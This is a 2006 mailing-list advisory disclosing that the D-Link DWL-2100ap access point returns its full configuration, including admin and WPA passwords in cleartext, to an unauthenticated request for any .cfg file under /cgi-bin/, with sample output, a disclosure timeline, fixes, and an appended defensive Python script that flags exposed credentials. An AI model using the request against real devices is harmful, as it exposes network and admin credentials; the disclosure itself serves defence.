Network Security VulnWatch

[VulnWatch] Advisory - D-Link Access Point

Subject: [VulnWatch] Advisory - D-Link Access Point
Date: Tue, 6 Jun 2006 22:09:46 -0300 (BRT)

INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

http://www.intruders.com.br/
http://www.intruders.org.br/

ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
PRIORITY: HIGH

I - INTRUDERS:
----------------
Intruders Tiger Team Security is a project linked to Security Open Source
(http://www.securityopensource.org.br).

The Intruders Tiger Team Security (ITTS) is a group of researchers with more
than 10 years of experience, specialized in the development of intrusion
projects (Pen-Test) and in special security projects.

All intrusion projects (Pen-Test) carried out so far by the Intruders Tiger
Team Security have had a 100% success rate.

II - INTRODUCTION:
------------------
D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):

D-Link, the industry pioneer in wireless networking, introduces a performance
breakthrough in wireless connectivity - D-Link AirPlus Xtreme G™ series of
high-speed devices now capable of delivering transfer rates up to 15x faster
than the standard 802.11b with the new D-Link 108G. With the new AirPlus
Xtreme G DWL-2100AP Wireless Access Point, D-Link sets a new standard for
wireless access points.

The D-Link DWL-2100ap is one of the most popular Access Points in the world.

III - DESCRIPTION:
------------------
During an intrusion project (Pen-Test), Intruders Tiger Team Security
identified a previously unknown vulnerability in the D-Link DWL-2100ap Access
Point that allows an attacker to read the device's configuration without
authenticating to the web server.

Extremely sensitive information is available in the configuration of the
D-Link DWL-2100ap Access Point, for example:

- User and password used to manage the device.
- Password used in WEP and WPA.
- SSID, IP, subnet mask, MAC Address filters, etc.

IV - ANALYSIS:
---------------
An HTTP request to the /cgi-bin/ directory makes the Web server return error
404 (Page not found).

An HTTP request to /cgi-bin/AnyFile.htm also makes the Web server return
error 404 (Page not found).

However, an HTTP request for any file name in the /cgi-bin/ directory with a
.cfg extension returns the entire device configuration.

For example, making the following request:

    http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

We would have a result equivalent to the following:

    # Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
    # DO NOT EDIT -- This configuration file is automatically generated
    magic Ar52xxAP
    fwc: 34
    login admin
    DHCPServer
    Eth_Acl
    nameaddr
    domainsuffix
    IP_Addr 10.0.0.30
    IP_Mask 255.0.0.0
    Gateway_Addr 10.0.0.1
    RADIUSaddr
    RADIUSport 1812
    RADIUSsecret
    password IntrudersTest
    passphrase
    wlan1 passphrase AnewBadPassPhrase
    # Several lines removed.

The D-Link DWL-2100ap Access Point does not allow the Web server to be
disabled, nor does it have options to filter ports. We also note that the
D-Link DWL-2100ap Access Point comes configured with a default user/password
(user: admin and no password).

V. DETECTION:
-------------
Intruders Tiger Team Security confirmed the existence of this vulnerability in
all firmware versions tested, including the latest version, 2.10na. Other
D-Link Access Point model(s) may also be vulnerable.

VI. SUGGESTION:
--------------
D-Link company:

1 - Use strong cookies to guarantee that only authorized users get access to
    the configuration.
2 - Store sensitive configuration values such as password(s) as hash(es).
3 - Allow the creation of firewall policies and rules to filter port(s) and
    IP(s).
4 - Require the user to change the default user/password on the first logon,
    and do not allow the password to be changed back to the last one used.
5 - Use HTTP with SSL (HTTPS).
6 - Contract companies specialized in Pen-Test and security audit to validate
    the security of D-Link products.

D-Link customers:

1 - Upgrade the firmware of the D-Link DWL-2100ap Access Point.
    Direct link to download is
    http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp

VII - CHRONOLOGY:
-----------------
11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last try of contact.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responded.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - Advisory published.

VIII - CREDITS:
---------------
Wendel Guglielmetti Henrique and Intruders Tiger Team Security discovered
this vulnerability.

Thanks to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme,
João Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open
Source).

Visit our website:

http://www.intruders.com.br/
http://www.intruders.org.br/
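
Added example (not part of the original advisory and not D-Link code): because the configuration file holds credentials in cleartext, every credential in it has to be treated as disclosed and rotated once the firmware is upgraded. The Python sketch below lists the credential settings in a saved configuration without echoing their values; the key words it matches, and the reading of "password" as the management password, are assumptions drawn from the excerpt in section IV.

```python
# Added example: triage of a saved DWL-2100AP configuration after exposure.
SECRET_WORDS = ("password", "passphrase", "secret")  # assumed from the excerpt

# Constructed sample, shortened from the excerpt printed in the advisory.
SAMPLE_CFG = """\
# DO NOT EDIT -- This configuration file is automatically generated
login admin
IP_Addr 10.0.0.30
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
"""

def split_setting(line):
    """Split one line into (key, value). On credential lines the key ends at
    the credential word, so a passphrase containing spaces stays intact."""
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if any(w in tok.lower() for w in SECRET_WORDS):
            parts = line.split(None, i + 1)
            value = parts[i + 1] if len(parts) > i + 1 else ""
            return " ".join(parts[:i + 1]), value
    parts = line.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")

def triage(cfg_text):
    """Return one finding per credential setting; values are never echoed."""
    findings = []
    for raw in cfg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, value = split_setting(line)
        if not any(w in key.lower() for w in SECRET_WORDS):
            continue
        if value:
            status = "cleartext"      # disclosed: rotate after the upgrade
        elif key == "password":
            status = "empty-default"  # assumption: admin login with no password
        else:
            status = "unset"
        findings.append({"key": key, "length": len(value), "status": status})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_CFG):
        print(f"{f['key']:<18} len={f['length']:<3} {f['status']}")
```

Every setting reported as "cleartext" is a secret to change on the device and anywhere else it is reused, such as the RADIUS server and the wireless clients.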